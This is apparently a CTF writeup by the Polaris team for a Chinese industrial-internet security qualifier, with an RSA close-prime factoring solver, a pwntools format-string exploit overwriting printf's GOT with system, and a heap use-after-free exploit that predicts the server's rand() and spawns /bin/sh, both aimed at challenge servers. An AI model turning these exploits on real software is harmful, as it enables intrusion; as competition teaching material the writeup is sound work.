China Industrial Internet Security Competition, Beijing Preliminary: Polaris Team Writeup

WriteUp, 2 years ago (2022), admin

We made it into the finals this time; kudos to all the players who took part!

We look forward to everyone's performance in the offline finals.

Results (scoreboard image in the original post)

Crypto

cry1

Brute-force the gap between p and q to recover them, then decrypt.

```python
import gmpy2                      # needed: gmpy2.invert is called by module name below
from gmpy2 import *
from random import *
import libnum
from z3 import *

e = 101684733522589049376051051576215902510166244234370429058800153902445053536138419222096346715560283781778705047246555278271919928248836576236044123786248907522717751222608113597458768397652361813688176017155353220911686089871315647328303370846954697334521948003485878793121446614220897034652783771882675756065
n = 106490064297459077911162044548396107234298314288687868971249318200714506925762583340058042587392504450330878677254698499363515259785914237880057943786202091010532603853142050802310895234445611880617572636397946757345480447391544962796834842717321639098108976593541239044249391398321435940436125823407760564233
c = 92367575354201067679929326801477992215675304496512806779109227230237905402825022908214026985431756172011616861246881703226244396008088878308925377019775353026444957454196182919500667632574210469783704454438904889268692709062013797002819384105191802781841741128273810101308641357704215204494382259638905571144

# Search used to recover p and q: the generator below sets q = next_prime(p + 2**420),
# so q - p = 2**420 + b for a small b; ask z3 for p, q with p*q == n for each b.
# for b in range(2000):
#     print(b)
#     S = Solver()
#     p = Int('p')
#     q = Int('q')
#     S.add(p*q==n)
#     S.add(q-p==2**420+b)
#     tmp = str(S.check())
#     print(tmp)
#     if tmp == 'sat':
#         print(S.model())
#         break

# Factors found by the search above
p = 10319402322686090423885467952714173652268828534546477197386930749224489548928953868783557378771133014491657222761298355394963285810795152496594136510185639
q = 10319402322686090423885467950006488404103970273239432095684700570087343967507257994593635913327166893587725950261323349433889479075061548042098460895952847

phi = (p-1)*(q-1)
d = int(gmpy2.invert(e,phi))
m = int(pow(c,d,n))
print(libnum.n2s(m))

# Challenge generator (for reference)
# m = bytes_to_long(flag)
# while True:
#     try:
#         p = getPrime(512)
#         q = next_prime(p+2**420)
#         n = p*q
#         phi = (p-1)*(q-1)
#         d = randint(0,n**0.32)
#         e = inverse(d,phi)
#         c = pow(m,e,n)
#         break
#     except:
#         continue
# print("e = %d"%e)
# print("n = %d"%n)
# print("c = %d"%c)
'''e = 101684733522589049376051051576215902510166244234370429058800153902445053536138419222096346715560283781778705047246555278271919928248836576236044123786248907522717751222608113597458768397652361813688176017155353220911686089871315647328303370846954697334521948003485878793121446614220897034652783771882675756065
n = 106490064297459077911162044548396107234298314288687868971249318200714506925762583340058042587392504450330878677254698499363515259785914237880057943786202091010532603853142050802310895234445611880617572636397946757345480447391544962796834842717321639098108976593541239044249391398321435940436125823407760564233
c = 92367575354201067679929326801477992215675304496512806779109227230237905402825022908214026985431756172011616861246881703226244396008088878308925377019775353026444957454196182919500667632574210469783704454438904889268692709062013797002819384105191802781841741128273810101308641357704215204494382259638905571144'''
```
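An added example (not the team's code): the same p/q recovery done with plain integer arithmetic instead of z3. Since the generator sets q = next_prime(p + 2**420), the gap d = q - p is 2**420 plus a small even offset, and for a candidate d the quadratic p*(p + d) = n has an integer root exactly when d*d + 4n is a perfect square; the same search doubles as a key-validation check for moduli whose prime gap is close to a predictable value. N is the challenge modulus copied from above.

```python
from math import isqrt

# Modulus n from the challenge (value copied from the writeup above).
N = 106490064297459077911162044548396107234298314288687868971249318200714506925762583340058042587392504450330878677254698499363515259785914237880057943786202091010532603853142050802310895234445611880617572636397946757345480447391544962796834842717321639098108976593541239044249391398321435940436125823407760564233

def recover_close_primes(n, gap_hint, max_offset=4096):
    """Factor n = p*q when q - p = gap_hint + b for a small even b >= 0.

    With q = p + d, p*q = n becomes p^2 + d*p - n = 0, whose positive root
    p = (sqrt(d^2 + 4n) - d) / 2 is an integer exactly when d^2 + 4n is a
    perfect square. Each candidate d costs one isqrt, so a few thousand
    offsets are checked in well under a second. Returns (p, q) or None.
    """
    for b in range(0, max_offset + 1, 2):   # two odd primes differ by an even number
        d = gap_hint + b
        disc = d * d + 4 * n
        s = isqrt(disc)
        if s * s == disc:
            p = (s - d) // 2
            q = p + d
            if p > 1 and p * q == n:
                return p, q
    return None

def prime_gap_offset(n, gap_hint, max_offset=4096):
    """Key-validation view of the same search: distance of the real prime gap
    from gap_hint if n factors this way, else None (gap is not near the hint)."""
    found = recover_close_primes(n, gap_hint, max_offset)
    return None if found is None else found[1] - found[0] - gap_hint

if __name__ == "__main__":
    p, q = recover_close_primes(N, 2**420)
    print("p =", p)
    print("q =", q)
    print("q - p - 2**420 =", prime_gap_offset(N, 2**420))
```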

Flag:

flag{24ceb9bc-08a5-4ba8-8ef5-231dcb049c0f}

PWN

究极输出

Leak the libc base through the format string, overwrite printf's GOT entry with system, and get a shell.

Format-string vulnerability with the input buffer in the bss segment.


We first debugged the binary dynamically and found that a libc address can be leaked with "%9$p".

After the leak, compute the libc base. Then use the two pointer chains on the stack (seen in the debugger) to write the address of printf's GOT entry, and the address of that entry + 2, onto the stack.

Once those are in place, use the format string again to overwrite the GOT entry with the address of system.

When the input and output finish, type sh by hand to get a shell, then cat flag.

In short: bss-segment format string, find two pointer chains, overwrite printf's GOT entry with system, then type sh by hand to get a shell.
```python
from pwn import *
# r = process('./pwn1')
r = remote("39.105.99.40",16018)
e = ELF('./pwn1')
libc = e.libc
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'

se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(ru(data)[-4:].ljust(4, b'\x00'))
uu64 = lambda data :u64(ru(data)[-6:].ljust(8, b'\x00'))
info_base = lambda tag, base :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))

def dbg(cmd):
    gdb.attach(r,cmd)

# Leak a libc pointer with %9$p and derive the base
ru(b'HELLO?PWN IT!!!\n')
sl(b"%9$p")
got = 0x403390
og = [0x45226,0x4527a,0xf03a4,0xf1247]
libc_base = int(rc(14),16)-0x20840
leak("libc_base",libc_base)
sys = libc_base + libc.sym['system']
offest1 = sys & 0xffff
offest3 = sys & 0xffffff
offest2 = int(offest3/0x10000)
shell = libc_base + og[0]
# First format string: write the GOT address and GOT+2 onto the stack via the two chains
pl1 = '%13200c%6$hn%4194306c%17$n'
sl(pl1.encode())
leak('sys',sys)
leak("shell",shell)
#36 8
# Second format string: write the low three bytes of system into the GOT entry
ru(b'HELLO?PWN IT!!!\n')
pl2 = "%" + "{}c".format(offest2) + "%36$hhn"
pl2 += "%" + "{}c".format(offest1-offest2) + "%8$hn"
sl(pl2.encode())
# dbg('')
r.interactive()
```
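An added example, not from the writeup: a small parser for printf conversion specifications (glibc grammar, including the positional `n$` index and the `h`/`hh` length modifiers the payloads above rely on) that lists every directive in an untrusted string and singles out the `%n` family, the only conversions that write memory. Fed the two payload strings above, it flags both as writes; the underlying fix is to never pass user input as the format argument (printf("%s", buf) rather than printf(buf)).

```python
import re

# One printf conversion, per the glibc grammar: %[N$][flags][width][.prec][length]conv
_DIRECTIVE = re.compile(
    r"%(?:(?P<pos>\d+)\$)?"            # positional argument index, e.g. %6$
    r"[-+ #0']*"                        # flags
    r"(?:\d+|\*)?"                      # field width (for %Nc: N bytes printed)
    r"(?:\.(?:\d+|\*))?"                # precision
    r"(?P<len>hh|h|ll|l|L|j|z|t)?"      # length modifier: hn/hhn write 2/1 bytes
    r"(?P<conv>[diouxXeEfFgGaAcspn%])"  # conversion character
)

def parse_directives(fmt):
    """List every conversion in fmt as (positional index or None, length, conv, text).
    A literal '%%' is not a conversion and is skipped."""
    out = []
    for m in _DIRECTIVE.finditer(fmt):
        if m.group("conv") == "%":
            continue
        pos = int(m.group("pos")) if m.group("pos") else None
        out.append((pos, m.group("len") or "", m.group("conv"), m.group(0)))
    return out

def write_directives(fmt):
    """The %n family: each stores the number of bytes printed so far through the
    corresponding pointer argument (8, 2 or 1 bytes for n / hn / hhn)."""
    return [text for _, _, conv, text in parse_directives(fmt) if conv == "n"]

def classify(fmt):
    """Triage label for an untrusted string that may reach printf as its format:
    'write' if it can modify memory, 'read' if it only discloses stack or memory
    contents, 'clean' if it contains no conversions at all."""
    directives = parse_directives(fmt)
    if any(conv == "n" for _, _, conv, _ in directives):
        return "write"
    return "read" if directives else "clean"

if __name__ == "__main__":
    for s in ["%9$p", "%13200c%6$hn%4194306c%17$n", "100%% done"]:
        print(repr(s), classify(s), write_directives(s))
```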

10 humidCtr

Defeat the pseudo-random check by seeding rand() with the same time as the server, then get a shell through a UAF.

```python
#!/usr/bin/python3
# -*- coding:utf-8 -*-
from pwn import *
import os, struct, random, time, sys, signal, ctypes

# Seed libc's rand() with the current time, as the server does, so the first
# rand() value below matches the one the server expects for "auth"
dll = ctypes.CDLL('libc.so.6')
dll.srand(dll.time(0))   # time(NULL): pass an explicit null pointer argument

class Shell():
    def __init__(self):
        self.clear(arch='amd64', os='linux', log_level='debug')
        # self.pipe = process(['./pwn'])
        self.pipe = remote('47.95.8.59', 29767)
    def send(self, data:bytes, **params):
        return self.pipe.send(data, **params)
    def sendline(self, data:bytes, **params):
        return self.pipe.sendline(data, **params)
    def recv(self, **params):
        return self.pipe.recv(**params)
    def close(self, **params):
        return self.pipe.close(**params)
    def recvrepeat(self, timeout, **params):
        return self.pipe.recvrepeat(timeout, **params)
    def interactive(self, **params):
        return self.pipe.interactive(**params)
    def clear(self, **params):
        return context.clear(**params)
    def recvn(self, numb, **params):
        result = self.pipe.recvn(numb, **params)
        if(len(result) != numb):
            raise EOFError('recvn')
        return result
    def recvuntil(self, delims, **params):
        result = self.pipe.recvuntil(delims, drop=False, **params)
        if(not result.endswith(delims)):
            raise EOFError('recvuntil')
        return result[:-len(delims)]
    def sendafter(self, delim, data, **params):
        self.recvuntil(delim, **params)
        self.send(data, **params)
    def sendlineafter(self, delim, data, **params):
        self.recvuntil(delim, **params)
        self.sendline(data, **params)
    # Challenge protocol: an HTTP-style request line, then an opcode byte
    # (1 add, 2 edit, 3 show, 4 delete) and '&'-separated arguments
    def add(self, index, size, content):
        self.send(b'POST / HTTP/1.1\r\n' + p8(1) + b'&' + str(index).encode() + b'&' + str(size).encode() + b'&' + content)
    def delete(self, index):
        self.send(b'POST / HTTP/1.1\r\n' + p8(4) + b'&' + str(index).encode())
    def show(self, index):
        self.send(b'POST / HTTP/1.1\r\n' + p8(3) + b'&' + str(index).encode())
    def edit(self, index, content):
        self.send(b'POST / HTTP/1.1\r\n' + p8(2) + b'&' + str(index).encode() + b'&' + content)


sh = Shell()
# Pass the auth check with the locally reproduced rand() value
sh.send(b'DEV / HTTP/1.1\r\n' + p32(dll.rand()) + b'auth')
time.sleep(1)
# Leak a libc pointer through show and derive the base
sh.add(0, 0x26, b'a')
time.sleep(1)
sh.show(0)
sh.recvuntil(b'The Humide Script 0 is set as ')
libc_addr = u64(sh.recvn(6) + b'\x00\x00') - 0x1ecb61
success('libc_addr: ' + hex(libc_addr))
time.sleep(1)
sh.add(1, 0x18, b'a')
time.sleep(1)
sh.add(2, 0x18, b'a')
time.sleep(1)
sh.add(0x10, 0x18, b'a')
time.sleep(1)
sh.delete(2)
time.sleep(1)
sh.delete(1)
time.sleep(1)
# Edit past chunk 0 into the freed chunk 1 and redirect its next pointer into libc
sh.edit(0, b'a' * 0x20 + p64(libc_addr + 0x1eee48))
time.sleep(1)
sh.add(2, 0x18, b'/bin/sh')
time.sleep(1)
sh.add(3, 0x18, p64(libc_addr + 0x52290))
time.sleep(1)
# Freeing chunk 2 triggers the hijacked call with "/bin/sh"
sh.delete(2)
sh.interactive()
```

Flag:

flag{aee62586-92bd-4e93-9d30-0ee356e2c5e2}

Closing note:

Everyone is welcome to join us:

星盟安全团队 recruitment QQ group: 222328705

Interested players are welcome to come and discuss!


Originally published on the WeChat official account 星盟安全 under the title "中国工业互联网安全大赛北京市预选赛-Polaris战队 WP".

Copyright notice: posted by admin on 23 October 2022 at 2:51 PM.
Please credit when reposting: 中国工业互联网安全大赛北京市预选赛-Polaris战队 WP | CTF导航
